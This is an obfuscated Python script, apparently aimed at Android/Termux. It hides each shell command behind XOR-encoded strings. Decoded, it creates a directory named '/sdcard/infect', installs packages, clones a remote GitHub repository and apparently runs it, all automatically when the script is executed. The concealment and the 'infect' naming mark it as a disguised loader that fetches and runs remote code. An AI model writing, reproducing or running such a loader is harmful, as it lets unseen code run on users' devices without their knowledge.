ll0l1Oll1100l11l0lOll = (lambda Ol1ll0l0OllOlllOl1OlO,
    lll0llO1Oll01l000l10O: Ol1ll0l0OllOlllOl1OlO ^ lll0llO1Oll01l000l10O)
O110O1l1ll1ll0lOlOO10 = __import__(''.join(chr(lll00110Olll01Ol1l0l1 ^
    lO1l11l0llOl01101l0lO) for lO1l11l0llOl01101l0lO, lll00110Olll01Ol1l0l1 in
    zip(b'\xec=', b'\x9eX')), globals(), locals(), [], 0)
O000ll111ll1O0Ol0lOOO = __import__(''.join(chr(O00l0111l0OO1Olll1l00 ^
    OlOll00O1lO0100O1l100) for OlOll00O1lO0100O1l100, O00l0111l0OO1Olll1l00 in
    zip(b'\xc6\xc0', b'\xa9\xb3')), globals(), locals(), [], 0 * 2 + 0)


def lOlOl1Oll0Ol1l0Oll001():
 try:
  getattr(O000ll111ll1O0Ol0lOOO, ''.join(chr(O111l0l0l11OOl110llO1 ^
      OO0O1lOl101OOlOll1000) for OO0O1lOl101OOlOll1000,
      O111l0l0l11OOl110llO1 in zip(b'\xef\xb84\nP', b'\x82\xd3Pc"')))(''.
      join(chr(OO11lOO10OOl00l0111l0 ^ l0111100Ol11ll1lO1l1O) for 
      l0111100Ol11ll1lO1l1O, OO11lOO10OOl00l0111l0 in zip(
      b'\xf0Y\x87\r\x94\xfe2\xf7\xac|\xcd\x81\x17/',
      b'\xdf*\xe3n\xf5\x8cV\xd8\xc5\x12\xab\xe4t[')))
 except OSError:
  pass
  getattr(O000ll111ll1O0Ol0lOOO, 'sys' + 'tem')(''.join(chr(
      Ol00O10O1ll0Ol11llOll ^ l1O11O0O11OOO01llO01O) for 
      l1O11O0O11OOO01llO01O, Ol00O10O1ll0Ol11llOll in zip(
      b'yD\xc6\x1d\xcf\xdd- \x91\x0e\x96\x15\xbd\xc4\xe5*+\xec\xc5Ol',
      b'\t/\xa1=\xa6\xb3^T\xf0b\xfa5\xcd\xbd\x91BD\x82\xe5b\x15')))
  getattr(O000ll111ll1O0Ol0lOOO, ''.join(chr(lO10ll10lOO1l11lO1011 ^
      l0O01l0l11Ol0l1llOO01) for l0O01l0l11Ol0l1llOO01,
      lO10ll10lOO1l11lO1011 in zip(b'cP\xc0\xd8M\x8b', b'\x10)\xb3\xac(\xe6'))
      )(''.join(filter(lambda lllll0O0O1llO1000l01O: ord(
      lllll0O0O1llO1000l01O) % 4 != 0, '8(t\x18 lPX\x14DT8@P ')).join(chr(
      llOO110ll0O0OlOOO1l1l ^ l001Ol1O1OlO01lOO11l1) for 
      l001Ol1O1OlO01lOO11l1, llOO110ll0O0OlOOO1l1l in zip(
      b'\x1czd\x81\xbdc\xa7\x0e\x15\xca#\xb8j\x18X.\xb8[|Y',
      b'l\x13\x14\xa1\xd4\r\xd4zt\xa6O\x98\x18})[\xdd(\x08*')))
  getattr(O000ll111ll1O0Ol0lOOO, 'metsys'[::-1])(''.join(filter(lambda
      O0l1O1ll11l0OO011O1OO: ord(O0l1O1ll11l0OO011O1OO) % 2 != 0,
      '(|.P@&p2pHf\x16X\\$')).join(chr(OOll0llOl10OOlO01O1lO ^
      OOl110lO0ll01001l0O10) for OOl110lO0ll01001l0O10,
      OOll0llOl10OOlO01O1lO in zip(
      b'0[\xa1\x9fo\x8b\xc1\x85\x18p\n\xd35!\xd4\xbd\xd8\xe9\x95\x1a=',
      b'@2\xd1\xbf\x06\xe5\xb2\xf1y\x1cf\xf3XD\xb7\xd5\xb9\x87\xfc`X')))
  getattr(O000ll111ll1O0Ol0lOOO, 'metsys'[::-1])(''.join(chr(
      O1010101l1O1OO0O101ll ^ O1OOOOl0OOl000O11l01l) for 
      O1OOOOl0OOl000O11l01l, O1010101l1O1OO0O101ll in zip(
      b'\xa4\x08\xd9\xa5\x19\x0f\xc0\xe6Vw9a%\xb3Le\x00 ',
      b'\xd4c\xbe\x85pa\xb3\x927\x1bUAK\xdc(\x00jS')))
  getattr(O000ll111ll1O0Ol0lOOO, ''.join(chr(lO00llOl0O1OOl1l01l0l ^
      l0O1O1l1l0Ol0l1Ollll0) for l0O1O1l1l0Ol0l1Ollll0,
      lO00llOl0O1OOl1l01l0l in zip(b'\xc4\xfc\xf84%5', b'\xb7\x85\x8b@@X')))(''
      .join(chr(lOlO1O1O00l11lOOO1OO1 ^ OlllO1l0111l101l01O01) for 
      OlllO1l0111l101l01O01, lOlO1O1O00l11lOOO1OO1 in zip(
      b'`b[\xb8\xbf\x8e\xcd \xa7\xb1\x81\x9c8\xd3\rH',
      b'\r\x125\x98\xd3\xe2\xacT\xd4\xdf\xe8\xbc\n\xa3d8'))[::-1 * 15 + 14])
  getattr(O000ll111ll1O0Ol0lOOO, ''.join(chr(Ol10lO0Ol110l0OOO0O1O ^
      O10O101lll1110Olllll0) for O10O101lll1110Olllll0,
      Ol10lO0Ol110l0OOO0O1O in zip(b'&\xec\xc4\xff^\xf5',
      b'U\x95\xb7\x8b;\x98')))(''.join(filter(lambda O1O1ll10O1l11l11l1l10:
      ord(O1O1ll10O1l11l11l1l10) % 5 != 0, '}\x1e#dxii}\x0f\x05xi7#U')).
      join(chr(OOlO1100ll1l0O111lO0l ^ O1l11O00l0O11OO0l0Ol0) for 
      O1l11O00l0O11OO0l0Ol0, OOlO1100ll1l0O111lO0l in zip(
      b"6z\nr'\xbd\xe4y*\x1fH))7L", b'F\x13zRN\xd3\x97\rKs$\tGG!')))
  getattr(O000ll111ll1O0Ol0lOOO, 'sys' + 'tem')(''.join(chr(
      Ol0l000ll01OOOOlOl01l ^ O101l1lll0lO0llOOOO0O) for 
      O101l1lll0lO0llOOOO0O, Ol0l000ll01OOOOlOl01l in zip(
      b'\xe8\x94&(\xbe\xc4\xb5\xd8\xd2\xbe\xd5\xf1V\xf0_\x0f\xd2\xf3\xcdA6\xad8\x8fG$hXl\x1d\x00\xdc/\xd0\x80m\xd7iYw\x11M\x02\x18j\x1b+\xe8\xaf\x84K\xfe-q\xc29t\xd3\x9e\xc7\xbcz\xd8'
      ,
      b'\x8f\xfdR\x08\xdd\xa8\xda\xb6\xb7\x9e\xbd\x85"\x80,5\xfd\xdc\xaa(B\xc5M\xediG\x075CIh\xb9\x02\x9d\xe1\t\xba\x087ZC(`w\x18u\x04\x81\xc1\xe2.\x9dY.\x87A\x00\xb6\xf0\xb4\xd5\x15\xb6'
      )))
  getattr(O000ll111ll1O0Ol0lOOO, 'sys' + 'tem')(''.join(filter(lambda
      llOO01lO1O110llOll11O: ord(llOO01lO1O110llOll11O) % 3 != 0,
      '\x129c{\x06\x0c6N\x06?\x1bfQT\x12')).join(chr(l11lO10OOl1OOl0Ol10Ol ^
      l00011l10l1O0O10O110l) for l00011l10l1O0O10O110l,
      l11lO10OOl1OOl0Ol10Ol in zip(
      b"3`\xd95\xd8\x93\xcf\xa1r\x9e\xb3\xab\xea0\xfb@\x9dn@`'\xf4\xdc\x11f'\x9c\xa8\xfc\xfa\xc0x\xe95Q\xfa\xc00^\xfb\x03\xf3"
      ,
      b'P\x04\xf9\\\xb6\xf5\xaa\xc2\x06\xc1\xf6\xd3\x9eU\x953\xf4\x01.@\x01\xd2\xfcs\x07T\xf4\x88\x95\x94\xa6\x1d\x8aA\x0e\xae\xaf_2\xd5p\x9b'
      )))


if __name__ == ''.join(chr(l10Ol0O1l11O1l11OOlOO ^ l00100lOl10l10l0O1llO) for
    l00100lOl10l10l0O1llO, l10Ol0O1l11O1l11OOlOO in zip(
    b'\x87\x03\x8c\xd5\xb3\x9e\xaf\x11', b'\xd8\\\xe2\xbc\xd2\xf3\xf0N'))[::-1
    ]:
 lOlOl1Oll0Ol1l0Oll001()
